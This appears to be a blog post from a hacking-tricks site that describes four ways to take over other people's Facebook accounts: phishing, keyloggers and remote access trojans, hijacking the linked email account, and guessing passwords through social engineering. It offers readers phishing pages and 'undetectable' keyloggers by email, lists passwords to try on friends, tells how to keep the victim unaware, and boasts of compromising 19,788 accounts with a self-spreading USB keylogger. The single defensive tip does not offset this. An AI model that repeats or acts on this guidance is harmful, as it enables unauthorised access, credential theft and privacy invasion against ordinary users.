  15. Today I will cover all 4 ways to Hack Facebook Account Password that all hackers usually use to hack your Facebook account. 1. Facebook Phishing Attack 2. Hacking Facebook account password remotely using Keyloggers and RAT's 3. By hacking the primary email address that user has used for creating Facebook account. 4. Social Engineering or simply Guessing your friends Password. Facebook Phishing Attack: I am explaining this method first because its the most easiest and also the most popular method for hacking Facebook password. You can also search on Google the various famous Facebook hacking methods and you will find Phishing technique on the top always. And I am explaining the methods according to their popularity. Now you want to know which is my favorite method for Hacking Facebook account passwords and i will undoubtedly tell its simply PHISHING. I will recommend my users to read this post for knowing how to hack Facebook using Phishing as i have explained it in detail here: If you want latest Facebook phisher then subscribe my Hacking tricks and mail me privately or post your email below in comments. I will provide you within a day, Now why i am not providing it directly, if i provide directly then Facebook will block it again like the previous one. Hacking Facebook account password remotely using Keyloggers and RAT's Aaw... Best method for advanced Hackers. And my second favorite too. Its popularity is little but lower than Phishing only because it involves you to download hack tool and then create your keylogger and send it to victim which is a lengthy process and also unsecured too as you don't aware that the keylogger that you downloading is himself contain some spyware or simply a keylogger attached with it. Keyloggingbecomes more easy if you have physical access to victim computer as only thing you have to do is install a keylogger and direct it to your destination so that it will send all recorded keystrokes to pointed destination. What a keylogger does is it records the keystrokes into a log file and then you can use these logs to get required Facebook password and thus can hack Facebook password. I have written a complete article on How to hack Facebook accounts remotely using Keyloggers, so i will recommend you to go through that if you want to learn this technique in detail, so read this article: Now if you need latest Fully Undetectable Keylogger, then subscribe my hacking tricks and mail me privately or post ur email ID below in comments on which you want to get the download link. Hacking the Primary Email address If Facebook hacker or any specific Keylogger, by some means, hacks your primary Gmail or yahoo account which you are using as primary email address, then this information account can easily hack your Facebook password using "Forgot password" trick. The Hacker will simply ask Facebook to send password to the primary email address and ask Facebook administrators to send the reset email to your primary email address- which is already hacked. Thus, your Facebook account password will be reset and it will also be hacked ! So, always remember to protect your primary email address that you have used to create Facebook account and try to keep unknown or useless mail id as your primary email address in Facebook. Social Engineering or Guessing Passwords This method sounds to be pretty not working at beginning. Even I was neglecting this way for a long time . But, once, I thought of using it against my friend on Facebook and amazingly what happened that i guessed his Facebook password very easily by this method. I think many of you might be knowing how what this social engineering, For novice hackers, Social engineering is method of retrieving password or Guessing the password or answer of security question simply be hacking some information about the victim or simply gathering his information from his own Facebook and other social networking profiles where most of users provide their critical information just for fashion and doesn't know its consequences. You have to be very careful while using this as victim must not be aware of your intention. Just ask him cautiously using your logic. Some Common passwords that you can try on your friends are : 1. Their mobile number or their girlfriend or boyfriend mobile number. (always try his previous or old mobile number as they are not as much as fool that they appears) 2. Their Girlfriend or boyfriend names or their own names concatenating with their Girlfriend or boyfriend names. 3. Date of births 4. Their favorite movie names , cartoon character names or favorite music band names or simply the hero names like batman,dark knight, Superman,Godzilla, Spartacus and much more.. 5. Most important now most website ask that password should be alphanumeric now what users do they just adds 1,2,3 in their normalpasswords and some more smart guys adds !,@,# in their passwords and amazingly all in Sequence. Note the above common passwords are not from any internet resource, its by my own case study that i have come to conclusion after hacking 19,788 emails accounts. I know now you want to know how i hacked so much accounts. As i have already mentioned for advanced hackers second option is best and the only thing that i did was just made my Keylogger USB and pendrive spreadable. Who ever used the infected USB drive also got infected and this procedure goes so on. And last what happened my 10Gb free storage was filled and i don't have enough time to clean it regularly.